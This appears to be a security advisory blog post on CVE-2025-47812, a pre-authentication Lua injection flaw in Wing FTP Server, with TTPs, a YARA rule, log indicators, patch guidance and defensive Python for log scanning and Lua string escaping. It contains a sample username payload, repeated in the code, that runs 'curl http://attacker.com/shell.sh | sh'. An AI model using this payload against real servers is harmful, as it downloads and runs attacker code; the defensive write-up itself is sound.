Bivash Nayak
30 Jul

🔍 Executive Summary

A critical Lua injection vulnerability (CVE-2025-47812) in Wing FTP Server is now under active exploitation, allowing unauthenticated attackers to execute arbitrary Lua scripts during authentication. The flaw has been added to the CISA Known Exploited Vulnerabilities (KEV) catalog, requiring mandatory patching by August 9, 2025.


⚙️ Technical Overview

📌 Vulnerability: CVE-2025-47812

  • Type: Remote Code Execution via Lua Injection
  • Severity: Critical (CVSS: 9.8)
  • Component: Custom Lua scripting engine used in login/authentication logic
  • Attack Surface: Pre-authentication — exposed over FTP/HTTP/SFTP interfaces
  • Exploit Status: In-the-wild exploitation confirmed
  • CISA KEV Inclusion Date: July 29, 2025

🧬 Exploit Mechanics

  1. Injection Point: Authentication API (e.g., via POST /admin_login, FTP AUTH, or REST login)
  2. Payload: Crafted Lua code injected into username/password fields or HTTP headers
  3. Execution Context: Lua interpreter tied to OnUserLogin or custom login handler
  4. Outcome:
    • OS-level command execution
    • User database exfiltration
    • FTP root traversal & lateral movement

🔥 Real-World Exploitation Indicators

🧑‍💻 Observed TTPs (Tactics, Techniques, Procedures):

  • Initial Access: Lua injection during login
  • Execution: os.execute("cmd.exe") or shell payloads
  • Persistence: Backdoor Lua scripts via .lua files
  • Exfiltration: Abuse of FTP/SFTP to leak files
  • Evasion: Obfuscated Lua + encoded payloads

🕵️ Detection Guidance

✳️ YARA Rule (Lua Code Execution Attempt in Wing FTP):

rule WingFTPLuaExploit
{
    strings:
        $lua1 = "os.execute("
        $lua2 = "io.popen("
        $lua3 = "require('socket')"
    condition:
        any of ($lua*) and filesize < 10KB
}

🧪 Syslog/Log Indicators:

/log/wftp.log:
[WARN] Lua error in OnUserLogin: attempt to call global 'os'...
[INFO] Unusual script activity from IP: 45.82.XXX.XXX
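The YARA strings and the two wftp.log lines above can be turned into a small triage script for login records and log exports. The following Python is an added example (not part of this advisory and not Wing FTP's own tooling): the indicator strings and the two log patterns are the ones quoted on this page, the SAMPLE_LOG lines are constructed, and the function names are my own.

```python
import re
from typing import Iterable

# Indicator strings copied from the YARA rule in the Detection Guidance section.
LUA_EXEC_MARKERS = ("os.execute(", "io.popen(", "require('socket')")
YARA_MAX_SIZE = 10 * 1024  # the rule's "filesize < 10KB" condition

# Log-line patterns derived from the two sample wftp.log entries on this page.
LOG_PATTERNS = [
    ("lua_error_in_login",
     re.compile(r"\[WARN\] Lua error in OnUserLogin")),
    ("unusual_script_activity",
     re.compile(r"\[INFO\] Unusual script activity from IP: (?P<ip>[0-9A-Za-z.]+)")),
]


def scan_login_value(value: str) -> list:
    """Return the Lua execution markers present in a username, password or header value."""
    return [marker for marker in LUA_EXEC_MARKERS if marker in value]


def matches_yara_rule(data: bytes) -> bool:
    """Python equivalent of the page's YARA rule: any marker present and file under 10 KB."""
    if len(data) >= YARA_MAX_SIZE:
        return False
    return any(marker.encode() in data for marker in LUA_EXEC_MARKERS)


def scan_log_lines(lines: Iterable[str]) -> list:
    """Return one hit dict per log line that matches a known indicator pattern."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for name, pattern in LOG_PATTERNS:
            match = pattern.search(line)
            if match:
                hits.append({"line": number, "indicator": name,
                             "ip": match.groupdict().get("ip"), "text": line})
    return hits


# Constructed sample input: the two indicator lines quoted on this page plus benign noise.
SAMPLE_LOG = [
    "[INFO] User alice logged in from 10.0.0.5",
    "[WARN] Lua error in OnUserLogin: attempt to call global 'os'...",
    "[INFO] File upload complete: quarterly-report.pdf",
    "[INFO] Unusual script activity from IP: 45.82.XXX.XXX",
]

if __name__ == "__main__":
    for hit in scan_log_lines(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['indicator']} ip={hit['ip']}")
    print(scan_login_value("admin'); os.execute('curl http://attacker.com/shell.sh | sh'); --"))
    print(matches_yara_rule(b"local h = io.popen('whoami')"))
```

scan_login_value is the piece to wire into whatever logs your authentication requests (a WAF rule, a reverse proxy hook, or a post-hoc pass over access logs); matches_yara_rule mirrors the rule's size condition, so a large benign script containing one of the strings is deliberately not flagged, exactly as the YARA rule would behave.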

🛡️ Mitigation & Response

Immediate Actions:

  • Patch to latest Wing FTP version (v7.3.9 or newer)
  • Disable custom Lua scripting temporarily (if not needed)
  • Inspect login scripts and config files (/scripts, /system)

Network Recommendations:

  • Block known malicious IPs exploiting this (e.g., via firewall or WAF)
  • Monitor for outbound FTP/SFTP exfiltration attempts
  • Isolate and inspect any abnormal user login events

🧰 Exploit Sample (Educational Purpose Only)

-- Injected in username field
username = "admin'); os.execute('curl http://attacker.com/shell.sh | sh'); --"

🗓️ Deadline Alert from CISA

CISA mandates all federal systems patch CVE-2025-47812 before August 9, 2025, under Binding Operational Directive (BOD) 22-01. Organizations should treat this as critical if running Wing FTP in public-facing infrastructure.


🧠 Expert Note from CyberDudeBivash

“Lua-based customization makes Wing FTP flexible but exploitable. Always sandbox dynamic scripting, especially in auth paths. This is a classic case of feature becoming an exploit vector when input isn’t sanitized.”
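One concrete form of the sanitization the note calls for: never splice a login value into Lua source as raw text. The Python below is an added example, not this page's code and not Wing FTP's; build_login_chunk_unsafe is a hypothetical stand-in for the concatenation pattern the exploit sample above relies on, build_login_chunk_safe is the hardened form that emits the value as a fully escaped Lua string literal, and statements_outside_literals is a crude checker that shows the difference. The real fix is to stop generating code from user input at all and pass the value to the script through an API or table; escaping is the fallback when that is not possible.

```python
# Named escapes for the characters that could end a double-quoted Lua literal early.
LUA_ESCAPES = {"\\": "\\\\", '"': '\\"', "\n": "\\n", "\r": "\\r"}


def lua_string_literal(value: str) -> str:
    """Render value as a Lua double-quoted literal that cannot terminate early.
    Every other control character (including NUL) becomes a three-digit decimal
    escape, which Lua reads as exactly one byte even when a digit follows it."""
    out = []
    for ch in value:
        if ch in LUA_ESCAPES:
            out.append(LUA_ESCAPES[ch])
        elif ord(ch) < 32 or ord(ch) == 127:
            out.append("\\%03d" % ord(ch))
        else:
            out.append(ch)
    return '"' + "".join(out) + '"'


def build_login_chunk_unsafe(username: str) -> str:
    """Hypothetical vulnerable pattern: the raw username is spliced into Lua source."""
    return "username = '" + username + "'"


def build_login_chunk_safe(username: str) -> str:
    """Hardened form: the username is emitted as a single escaped string literal."""
    return "username = " + lua_string_literal(username)


def statements_outside_literals(chunk: str) -> int:
    """Count ';' characters that sit outside any Lua string literal.
    A correctly quoted login chunk yields 0; an injected one yields at least 1."""
    count = 0
    quote = None
    i = 0
    while i < len(chunk):
        ch = chunk[i]
        if quote:
            if ch == "\\":
                i += 1  # skip the escaped character
            elif ch == quote:
                quote = None
        elif ch in ("'", '"'):
            quote = ch
        elif ch == ";":
            count += 1
        i += 1
    return count


if __name__ == "__main__":
    # The username value from the exploit sample on this page.
    payload = "admin'); os.execute('curl http://attacker.com/shell.sh | sh'); --"
    for builder in (build_login_chunk_unsafe, build_login_chunk_safe):
        chunk = builder(payload)
        print(builder.__name__, "->", statements_outside_literals(chunk), "extra statements")
        print("   ", chunk)
```

Running the block shows the unsafe builder turning the sample username into a chunk with two additional statements, while the safe builder leaves the same bytes inert inside one literal; the checker also stays at zero when the value uses double quotes, because those are escaped rather than terminating the literal.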